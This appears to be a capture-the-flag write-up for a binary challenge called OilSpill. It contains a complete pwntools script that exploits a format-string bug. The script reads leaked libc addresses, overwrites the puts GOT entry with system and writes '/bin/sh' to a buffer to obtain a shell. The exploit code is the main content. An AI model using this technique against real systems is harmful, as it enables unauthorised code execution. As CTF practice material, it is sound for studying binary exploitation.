Rating:

Format string exploit. Overwrite the `puts` GOT entry with `system` and the buffer that `puts` is later called on with `/bin/sh`. No separate leak stage is needed because the program prints the `puts`/`printf` addresses itself (the script parses them from the first line of output and derives the libc base from them).

```python
3 │ from pwn import *
4 │
# Target binary: a patched copy of the challenge. Registering it as
# context.binary makes pwntools take arch/os/endianness from it, so the
# packing helpers used later match the target.
elf = ELF("./OilSpill_patched")
context.binary = elf

# Gadget table for the binary. NOTE(review): nothing in this script uses
# `rop` — the exploit is a pure format-string GOT overwrite — so this
# (and the gadget-cache file it writes) could be dropped.
rop = ROP(elf)

# gdb script used when GDB=1: just let the process run.
gs = "\ncontinue\n"

# Flip on to dump every byte sent/received while debugging the payload.
# context.log_level = "debug"
14 │
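def conn():
    """Open a tube to the target and select the libc used for symbol math.

    REMOTE=1 connects to the challenge host and loads the Ubuntu 18.04 libc
    build the service ships with; otherwise a local process is started and
    the system libc is used. GDB=1 (local only) attaches gdb with the `gs`
    script instead of spawning a plain process.

    Side effect: assigns the module-level `libc` ELF that the rest of the
    script reads offsets from.

    Returns:
        A pwntools tube (remote, process or gdb-backed process).
    """
    global libc
    if args.REMOTE:
        libc = ELF("libc6_2.27-3ubuntu1.5_amd64.so")
        return remote("oil.sdc.tf", 1337)

    # Local run. NOTE(review): the binary is "_patched", presumably to run
    # against a bundled loader/libc; if so, /usr/lib/libc.so.6 is the wrong
    # libc for offset math locally — point this at the bundled copy. TODO confirm.
    libc = ELF("/usr/lib/libc.so.6")
    if args.GDB:
        # Previously a plain process() was spawned first and then abandoned
        # when gdb.debug() started a second instance; spawn exactly one.
        return gdb.debug(elf.path, gdbscript=gs)
    return process([elf.path])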
27 │
def send_payload(payload):
    """FmtStr callback: deliver one format-string payload to the live tube.

    pwntools' FmtStr calls this with the bytes it wants written; the
    module-level tube `p` must already be connected (it is assigned right
    after this definition). Nothing is returned — with an explicit
    `offset`, FmtStr does not need the program's response.
    """
    tube = p
    tube.sendline(payload)
30 │
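p = conn()

# The challenge prints its own leak on the first line, assumed to be
# "<puts>,<printf>" in hex (index 0 -> puts, index 1 -> printf), which is why
# no separate info-leak stage is needed. strip() tolerates a trailing "\r\n"
# as well as "\n".
addresses = p.recvline(keepends=False).strip().split(b",")

puts = int(addresses[0], 16)
printf = int(addresses[1], 16)
info(f"Leaked printf @ {hex(printf)}")
info(f"Leaked puts @ {hex(puts)}")
libc.address = printf - libc.sym.printf
info(f"Leaked libc.address @ {hex(libc.address)}")

# Sanity-check the libc selection before spraying writes: the base must be
# page-aligned, and the second leak must agree on the same base. A mismatch
# means conn() picked a libc build whose symbol offsets differ from the
# target's, which would otherwise surface only as a confusing crash.
if libc.address & 0xfff:
    raise RuntimeError(f"libc base {hex(libc.address)} is not page-aligned: wrong libc build?")
if puts - libc.sym.puts != libc.address:
    raise RuntimeError("puts/printf leaks disagree on the libc base: wrong libc build?")

# Writable address inside the (non-PIE) binary that the later puts() call
# receives as its argument; presumably a .data/.bss buffer. TODO confirm
# against the disassembly or elf.sym rather than keeping it as a magic number.
BINSH_ADDR = 0x600c80

# offset=8: index of the input buffer among printf's stack arguments, supplied
# by hand here (FmtStr can also probe for it if omitted). Both writes are
# packed into one payload by execute_writes():
#   1. "/bin/sh\0" into the buffer puts() will be called on,
#   2. GOT[puts] := system, so that call becomes system("/bin/sh").
format_string = FmtStr(execute_fmt=send_payload, offset=8)
format_string.write(BINSH_ADDR, b"/bin/sh\0")
format_string.write(elf.got.puts, libc.sym.system)
format_string.execute_writes()

p.interactive()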
```